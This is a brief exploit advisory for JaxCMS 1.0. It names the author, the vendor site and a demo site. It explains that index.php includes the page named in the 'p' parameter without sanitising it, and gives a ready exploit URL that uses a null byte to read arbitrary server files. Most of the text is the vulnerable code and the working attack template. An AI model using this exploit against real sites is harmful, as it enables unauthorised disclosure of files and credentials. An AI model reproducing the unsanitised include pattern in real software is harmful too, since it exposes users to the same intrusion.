/* Name : JaxCMS (p) Local File Include WebSite : http://www.pixiescripts.com/ Demo : http://www.pixiescripts.com/demo/JaxCMS1.0/ Author : Hamza 'MizoZ' N. Email : mizozx@gmail.com Greetz : Zuka ! */ The vulnerability is in the get $_GET['p'] , the index.php include '/pages/'.$_GET['p'].'.php' So we can read any file in the server . EXPLOIT : [HOST]/[JaxCMS PATH]/index.php?p=[LFI]%00